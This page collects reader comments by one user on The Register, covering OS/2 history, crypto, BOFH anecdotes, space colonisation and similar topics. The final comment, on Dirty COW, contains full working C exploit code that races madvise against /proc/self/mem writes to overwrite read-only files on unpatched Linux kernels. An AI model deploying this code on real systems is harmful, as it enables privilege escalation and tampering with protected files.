* Posts by frankvw

20 posts • joined 25 Oct 2016

Chromium-adjacent Otter browser targets OS/2

frankvw
Megaphone

A few more pedantic details

While most of what has been said about how MS never played fair against OS/2 is quite correct, as are the statements about IBM's fragmented management at the time, there's a little more to it than that.

When Windows came into existence, Microsoft had been collaborating with IBM on OS/2 1.x for some time. This collaboration sprang from the insight that, with the advent of the 80286 CPU and Intel's plans for the 80386, DOS had essentially become obsolete. IBM worked mainly on the OS/2 kernel, which in its first incarnation was basically a 16-bit successor to DOS with a command-line interface. Microsoft concentrated on the graphical user interface (GUI).

The idea of a graphical user interface was neither new nor original. Years before, Xerox had demonstrated a mouse-controlled GUI at their Palo Alto Research Center. This demonstration featured the Alto computer, which in 1973 sported a GUI, a mouse, graphic WYSIWYG technology and an Ethernet network interface. The demo was attended by Steve Jobs (Apple) and Bill Gates, among others. Jobs saw the possibilities of the GUI and went on to implement the idea in Apple's OS and application software, while Gates decided to stay with the text-based user interface. Later Gates was forced to revise his opinion of the GUI when it turned out to be successful on the Apple platform. Thus it was decided that OS/2 would have a GUI.

Soon Microsoft's code began to diverge from IBM's (especially from Presentation Manager, then IBM's GUI component of OS/2) and became increasingly incompatible with it. Meanwhile Gary Kildall of Digital Research had already released the first version of GEM, the Graphics Environment Manager for DOS. In order to sabotage this, Microsoft announced that they were working on their own, much better, graphic environment. Eventually they took the GUI portion of what should have become OS/2 and sold it as a separate DOS application which they named MS-Windows. In its initial form it was mainly text based and hardly useful, but MS claimed to be working on it in preparation for the upcoming OS/2. In the meantime, application developers (e.g. WordPerfect Corp., Ashton-Tate and Lotus) spent huge R&D budgets on rewriting their applications for OS/2, assuming that the IBM/Microsoft partnership would deliver as promised.

MS-Windows could have been a new start, but (mainly for strategic and marketing reasons) it wasn't. It clung tightly to the mistakes of the past, being based upon the underlying MS-DOS architecture for basic OS functions such as file system access. It added a simple cooperative multitasker to MS-DOS, in a manner strangely like that of DESQview (a multitasker for DOS that had been available from Quarterdeck for years). It also sported a GUI that was so close to the one used by Apple that it kept lawyers occupied for over half a decade. But as far as innovation was concerned, that was it.

Initial versions of Windows were very bad, but Microsoft kept promising that a better product would come out Real Soon Now, still as part of their joint OS/2 efforts with IBM. Until one day, that is, when they suddenly turned their backs on OS/2. They cried "innovation" and went back to DOS, in spite of having earlier admitted it was obsolete. Then they dropped out of the collaboration with IBM entirely, taking with them a lot of IBM technology that had ended up in Windows, which they now suddenly positioned as the operating system of the future. They never even mentioned their earlier promises about OS/2 again.

Microsoft already sold applications for the Apple Macintosh. This gave them a good look under the hood of Apple's operating system software, and enabled them to muscle Apple into granting them a license for portions of the MacUI. (They threatened to withdraw all Mac applications unless Apple granted them a license to use MacUI code to port Macintosh apps to the PC.) They then raided the MacUI for extra ideas. The remaining few bits (e.g. the font technology they later called TrueType) they bought, occasionally bartering vaporware that later failed to materialize. They also threw in a random collection of small applications completely unrelated to an operating system (e.g. Paintbrush), which they had bought from various sources to flesh things out a bit. The resulting mixed bag of bits and pieces was massaged into an end product and released as Windows 3.0.

It was not too difficult for Microsoft to adapt the Apple versions of Word and Excel to run on Windows 3. There is some indication that Windows was adapted to Word and Excel as much as Word and Excel were adapted to Windows. By the time Windows 3.0 hit the market, competing application developers had already put their R&D money into OS/2 versions of their products, on the assumption that OS/2 would be delivered as promised by the IBM/Microsoft partnership. And now OS/2 did not materialize. But a blown R&D budget was only half the problem. Even if most of the application manufacturers had been wealthy enough to fund two separate development efforts to upgrade their DOS products, there was not enough time to do a Windows version before Windows' projected release date. The fact that the Windows API had not yet been published in any permanent form didn't help either. Without a good API specification, an application developer cannot interface with the operating system or with other software products, which essentially prevents application development. And Microsoft was the only application vendor at the time that knew enough about the Windows API to come up with market-ready Windows applications.

So Microsoft shipped both an OS and an application suite for it, several months before anyone else in the applications market had a chance to catch up with Microsoft's last-minute switch to Windows - and that was that. All those who had expected to sail with the IBM/Microsoft alliance missed the boat when Microsoft suddenly and deliberately cast off earlier, and in a different direction, than they had originally promised.

Most of the independent application vendors who had committed themselves to OS/2 never recovered.

IBM eventually went on to release their own version of OS/2, and botched its marketing completely with campaigns revolving around dancing elephants and nuns with pagers. This was partially due to the fact that by the time OS/2 hit the market, that market had already been taken away from them by Microsoft, and IBM never fully realized the extent of the changes that had been wrought upon it while they weren't looking. Most application developers had irrevocably committed themselves to Windows at that point, and they now used Windows development tools which produced code that was extremely hard to port to another OS. Native OS/2 application software remained scarce, and hardware support was an even bigger problem. As a result, most OS/2 users ended up trying to run Windows applications on OS/2, which often came with quite a few hurdles and problems.

Even so, IBM remains responsible for much of the demise of OS/2. Although it had an infinitely better architecture than Windows, OS/2 was killed off by some of the worst strategic and marketing decisions in the history of the industry. Its brief and unhappy existence was marked by a lack of drivers and hardware support, a lack of development tools, and a lack of native applications. In typical IBM fashion, the end user was expected to manually edit a lengthy CONFIG.SYS file (four or more pages of cryptic, text-based configuration items) to configure the system. Partnerships with hardware vendors to ship OS/2 on systems that couldn't run it properly made the problem even worse, and disastrously bad marketing drove the final nail into OS/2's coffin.

After this debacle IBM withdrew from the desktop software market, which they had never really understood despite having created the original IBM PC.

India's Reserve Bank deputy governor calls for crypto ban

frankvw

Re: "They fear it because they can't control it. They hate us for our freedom"

I hear that a lot: the idea that cryptocurrency has Big Government (and Big Finance) crapping their pants because it takes away their power over the oppressed masses. Just like any other conspiracist drivel, there is a tiny grain of truth here: cryptocurrency is indeed not controlled by a central authority. In this respect it's a lot like the old American Wild West: one great big free-for-all. There's plenty of freedom for everyone to do whatever they want, but the downside is that it is also a fertile breeding ground for lawlessness. There are good reasons why crypto has a bad rap as the tool of choice for scammers, terrorists and other criminals: it is ideally suited to their purposes, so of course it gets used for those purposes. A lot.

Crypto's lack of regulation is a two-edged sword: it allows total freedom, but that includes the freedom for it to be used for crime with impunity. In practice, "unregulated" quite often means "lawless" and that goes for crypto, too. And it shows.

Just like the old Wild West, crypto will eventually lose its unregulated character when (not if) the disadvantages of lawlessness begin to outweigh the advantages of non-regulation. When that happens, the question is what raison d'être crypto will have left.

Meanwhile crypto is here, and both banks and governments are trying to deal with that fact as well as possible. Pointing out its disadvantages and arguing against its use is not to be taken as a sign of fear or envy. Both scammers and conspiracy nuts would have you believe it is, but that doesn't make it true.

BOFH: They say you either love it or you hate it. We can confirm you're going to hate it

frankvw

Deja vu!

This reminds me of 1996, when I was working as a contractor for a large telco. The "Security Manager" (read: an utterly useless bloke they couldn't get rid of and who was therefore parked in a made-up function) decided to email the entire company, all 3,500 or so employees, about the dangers of MS Word macro viruses. Remember, this was when Windows 95 and Office were just taking over the desktop, and Outlook was still fairly new to most people, including our Security Damager. So what did he do? He typed it up in Word and then used Word's "send document as email" function to distribute it to the masses, not realizing, of course, that this would send everyone an email with his Word file attached.

You can probably guess what happened next.

Fortunately, at the networking department we ran Solaris on our workstations rather than M$ rubbish, so our little enclave remained unaffected (and uninfected); the rest of the 3,500+ staff were less lucky. I remember that episode as a very, very long weekend.

Chinese chip designers hope to topple Arm's Cortex-A76 with XiangShan RISC-V design

frankvw
Big Brother

Cue US concerns about the embedded spy code in these chips and a subsequent embargo in three, two, one...

BOFH: When the Sun rises in the West and sets in the East, only then will the UPS cease to supply uninterrupted voltage

frankvw
Flame

As a fellow anonymous South African coward, I'm surprised you didn't note the above remarks about the virtues of running vital equipment at 100+% capacity indefinitely and what that has done to our national power grid.

So at the pub have one for me, provided loadshedding or unscheduled power failures don't get in the way...

The silicon supply chain crunch is worrying. Now comes a critical concern: A coffee shortage

frankvw

Meh. I have been roasting my own coffee beans (which is ridiculously easy) for years. Buying green beans in bulk (10-15kg or so) means you end up paying about a third of the going retail price, and that retail price is for bog-standard coffee, not the single-origin gourmet quality that fresh home-roasted coffee essentially is. Green beans, when properly packaged and stored, have a shelf life of at least 2 years. So I've got the better part of 25 kg in stock and I'm ready for Armageddon. (And I'm not even mentioning home brewed beer and home distilled hooch here.)

Time to become more self-sufficient, people!

It only took four years and thousands of complaints but ICANN finally kills off rogue Indian domain registrar

frankvw
Facepalm

Re: Between this and Nominet...

The problem is not DNS itself. The problem is the bureaucratic organization that oversees the (mis)management of the administrative side of domain name registration and allows the registries to be mucked up either deliberately or out of incompetence. Trying to fix this problem by overhauling the DNS system is like trying to fix Boris Johnson by overhauling democracy.

How the US attacked Huawei: Former CEO of DocuSign and Ariba turned diplomat Keith Krach tells his tale

frankvw

Meanwhile, in the rest of the world...

While Huawei may or may not be Pure Evil, bent on world domination by using all our precious private data, let's not forget the other baddies out there. The Mossad, for example, has fingers in many pies and backdoors in many data centres through "confidential" agreements with various governments who should know better. While Israel is the only one I have first-hand information about, I'm sure there are more.

The reality of the situation is that the West seems to need an enemy. It used to be the Russians, but now that the Cold War is essentially over and they have ceased to be our favourite threat, China has been promoted to fill that role. Once they turn out not to live up to our expectations of being horrible, something else will be chosen to fill the niche. A conglomerate of all Islamic countries, perhaps, or maybe the French, who knows...

Considering the colonisation of Mars? Werner Herzog would like a word

frankvw

Re: Where's the money?

"Profitable? It most certainly has the same mineral resources Earth has,"

Exactly my point. The same stuff we have here does not cover the cost of going to Mars for it.

"so if there is enough water,"

Which remains to be seen.

"Mars could be easily self-sustaining."

Possibly, yes. But you're missing the point: colonizing Mars would take a huge investment with near-zero returns. Granted, the spinoff in the form of developed technology will indirectly benefit us all. But that's not the way investors and taxpayers like to see their money being spent.

"It's not a "get rich fast" place, but then again America wasn't either: It was a place of opportunities and potential freedom."

And enough people could afford to get there, paying for the trip out of their own pockets. Let me see you do that on a trip to Mars.

"Besides, don't mix up biological colonization and Colonization as in pith helmets and rifles. There was no real profit in settling in the sub-arctic frozen wastes where nothing grows, scraping a harsh life from hunting and fishing. Yet, humans did it. Living in or near the big deserts isn't fun either, yet humans did it too."

Because they pretty much had to. So yes, when things become so crowded here that we have to spill over to Mars, we'll re-evaluate.

"So it doesn't matter if Mars will never be the green seashore paradise one would dream of, it remains a place where humans can potentially live. Life will be difficult, but not more difficult than life was back then for those people who colonized inhospitable regions of Earth."

frankvw
Facepalm

Where's the money?

Exploration has always been driven by Man's insatiable curiosity and need to investigate and expand. Colonization, on the other hand, has always been driven by profit and nothing else. America was settled because it was a land of huge resources and settlers could build a better life there than in their countries of origin. The "scramble for Africa" was driven solely by a desire to exploit the resources found there. And so on.

Mars, on the other hand, has few profitable resources to offer. Yes, Man could conceivably eke out an existence there somehow, but what would pay for the huge investments required for such an undertaking? It's a desert. There's all the dust, sand and rocks you could want, and a little water ice as well (but not too much), but that's it.

Forget the very real problems of terraforming Mars. What will really make sure Mars will never be colonized (barring a single, small scientific outpost perhaps, which is NOT colonisation) is the simple fact that there's no profit to be made on such a venture. The cost of lifting anything to Mars is so great that you would need to find something like Unobtanium there to make it worth it.

The moon suffers from similar problems, although to a far lesser degree; it's closer and therefore cheaper to reach, and Helium-3 might (!) be the bonanza that could potentially make it worth it. But what profitable commodities does Mars have to offer to cover the costs of colonization, exploitation and transportation, AND make a profit on top of that? If there is one, I can't see it.

Whoa, humans have been hanging out and doing science stuff in freaking space aboard the ISS for 20 years

frankvw

Re: Tow it out to the moon...

Getting the ISS up to escape velocity without breaking it up and then decelerating it into a lunar orbit is going to be more complicated than building it on-site. Still, kudos for thinking out of the box. :)

BOFH: Rome, I have been thy soldier 40 years... give me a staff of honour for mine age

frankvw
Holmes

Titus Andronicus, no less

So good to see that the BOFH knows his classics!

Forget Terminators, says US military, the next-gen AI battles will hinge upon net infrastructure, not killer robots

frankvw
Mushroom

They do have a point, though

All the above comments notwithstanding, there is one very real aspect that everyone seems to forget: warfare is 10% fighting and 90% logistics.

Look at WWII: by wiping out one single ball-bearing factory the Allied forces set the Reich back further than ten D-Days ever could have done. And D-Day itself was an exercise in logistics. By harming the enemy's logistics (which, let's face it, is entirely IT-based these days) one can do more damage with less risk of repercussions, loss of friendly lives and materiel expenditure than with a platoon of high-tech droids.

The same goes for intelligence operations: ensuring proper intelligence and, if at all possible, feeding the enemy misinformation, is vital to any sort of warfare, not only in modern terms but throughout history.

So yes, there is a point to all this.

Icon selected for appropriateness.

Physical locks are less hackable than digital locks, right? Maybe not: Boffins break in with a microphone

frankvw

Opening a mechanical lock by recording its sound and translating that into a duplicate key (no doubt 3D printed)... I wonder when that's going to show up on CSI or one of the spin-offs. I give it a few months at the outside.

From 'Queen of the Skies' to Queen of the Scrapheap: British Airways chops 747 fleet as folk stay at home

frankvw

Contrary to previous commenters, I've always liked the 747. I've spent more time on it as a passenger than on all other aircraft combined (although I haven't flown as much in the past decade as I did prior to that), and for some reason I remember my flights on a 747 as more comfortable. I'm not sure if it was the way the aircraft handled (it always seemed more... well, stable, somehow, than more recent designs), but the seats never left me quite as wrecked after a 10+ hour flight as the ones on Airbuses and the like did. I'll miss the 747.

The longest card game in the world: Microsoft Solitaire is 30

frankvw

But still...

I have never been a MICROS~1 fan, and to say something positive about them here is like blaspheming in church, but in the interest of balance I'm going to have to: including Solitaire in Windows was a good move. It was intended as a tool to introduce technophobic noobs to working with a computer with a GUI and a mouse, and I have used it successfully for that purpose many times during my dark days of staff training and support. It did what it was designed to do and performed a useful function, which is more than can be said for many other Windows features.

And as MS apps go, Solitaire has always been reasonably well behaved. I know it has the reputation of being to productivity what a black hole is to light, but the various problems associated with other MICROS~1 products over the years amount to a far greater productivity loss than poor Solitaire could ever hope to achieve; not least because those who play it during working hours would otherwise be prone to other forms of wasting time anyway. It's the worker's attitude, not the handy temptation of an on-screen card game, that is the leading cause of non-productivity.

In short, Solitaire has helped more noobs overcome their techno/computer/Windows phobia than it has turned good office workers into bad time wasters.

The iMac at 22: How the computer 'too odd to succeed' changed everything ... for Apple, at least

frankvw

Reading the comments, I don't see the iMac's biggest advantage mentioned: it had no floppy drive.

Having been a sysadmin in education, I can reliably report that floppy drives in a classroom (and, to a lesser degree, in a corporate environment) are a pain and serve no good purpose. They serve as an unmonitored point of ingress for pirated software and malware, and a potential point of egress for confidential information; they collect dust and other contaminants and are prone to failure.

Then along came the iMac, which moved a lot of the workstation-based need for system administration to a network-central approach and, with a generic hard drive image, reduced the computer essentially to an appliance that could be swapped out for another one in case of problems. Sysadmins worldwide heaved sighs of relief.

ESA toasts 10% budget boost by stretching ISS support out to 2030

frankvw
Facepalm

Whacknut jobs? Maybe not...

Granted, Musk and Bezos and the rest of that lot belong to a particular species of eccentrics. But for good reason: to achieve what they have, you have to be one!

Musk especially is a good example. SpaceX has achieved things in 17 years that NASA (and Boing!) are still not capable of, in spite of having been in the game for more than half a century and having been allocated budgets with many more zeroes than SpaceX has to play with.

You can't do all that unless you have an ego the size of Jupiter.

So yes, he's a little weird. But he's been successful because of it, not in spite of it.

Space-wrecks: Elon's prototype Moon ferry Starship blows its top during fuel tank test

frankvw
Pint

This is what tests are for

It's called rocket science for a reason.

As I recall, the US Air Force in the 1950s had a good number of spectacular launch failures while developing rockets before they managed to get one off the pad in one piece. (Not counting the German Nazi rockets they'd carted out of Peenemunde in '45, of course.) If it hadn't been for the Cold War and the need to get spy sats over Russia, the boffins probably never would have stuck with it. And later rocketry wasn't without its problems, either. Think Apollo 1 and two lost Space Shuttles... Or the Russian space program's encounters with failed descent parachutes, explosive decompression and a goodly number of explosions on the pad as well. So I'm all for testing the heck out of everything, and I'm not even expecting to ever fly in one of these things.

This is how technology gets developed. You do the best you know how; you test; you fail; you change what you borked and you test again. If everyone knew how to get it 100% right the first time... Well, where's the fun in that?

So here's a pint raised to the guys who test stuff!

Dirty COW explained: Get a moooo-ve on and patch Linux root hole

frankvw
Angel

Re: The very definition of technical debt

"390's must be way way way less than 5% of the linux base in terms of user numbers or cpu counts... Way way way less."

That is not the point. When this bug went unfixed, it was because at that moment in time it was simply unacceptable to just break Linux on S/390. Commit f33ea7f404e5, more than a decade ago, posed a simple question: do we live with a vulnerability that at this point in time is a minor and obscure one, or do we break Linux on a type of host that is usually deployed in response to high-reliability and high-availability requirements? To which the answer would be "Duh", AFAIC.

That said, this could have been better documented at the time and perhaps fixed before it became a high-profile issue. Still, we now all know what happened, why and how it happened, and what was done to adequately fix it. Which is the proper way to deal with this.
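For anyone who came to this late, here's a minimal sketch (my own illustration, not anything taken from the commit in question) of the user-space race that gave Dirty COW its name, assuming an unpatched kernel from before the October 2016 fix. One thread keeps discarding the private copy-on-write page with madvise(MADV_DONTNEED) while another keeps writing to a read-only, private mapping through /proc/self/mem; on vulnerable kernels the write can occasionally land in the underlying read-only file. Compile with -pthread; on any patched kernel the target file simply remains unchanged.

/*
 * dirtycow_sketch.c - illustrative only. Demonstrates the copy-on-write
 * race behind CVE-2016-5195 against a read-only file of your choosing.
 * Only has any effect on Linux kernels from before the October 2016 fix;
 * on patched kernels the file is left untouched.
 */
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

static void *map;                         /* PROT_READ, MAP_PRIVATE mapping */
static const char payload[] = "m00!";

static void *madvise_loop(void *unused)
{
    (void)unused;
    for (int i = 0; i < 1000000; i++)     /* keep throwing away the COW copy */
        madvise(map, sizeof(payload), MADV_DONTNEED);
    return NULL;
}

static void *write_loop(void *unused)
{
    (void)unused;
    int mem = open("/proc/self/mem", O_RDWR);   /* sidesteps PROT_READ */
    for (int i = 0; i < 1000000; i++) {
        lseek(mem, (off_t)(uintptr_t)map, SEEK_SET);
        write(mem, payload, sizeof(payload) - 1);
    }
    close(mem);
    return NULL;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <read-only file>\n", argv[0]);
        return 1;
    }
    int fd = open(argv[1], O_RDONLY);
    struct stat st;
    fstat(fd, &st);
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);

    pthread_t a, b;                       /* race the two loops against each other */
    pthread_create(&a, NULL, madvise_loop, NULL);
    pthread_create(&b, NULL, write_loop, NULL);
    pthread_join(a, NULL);
    pthread_join(b, NULL);
    return 0;
}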
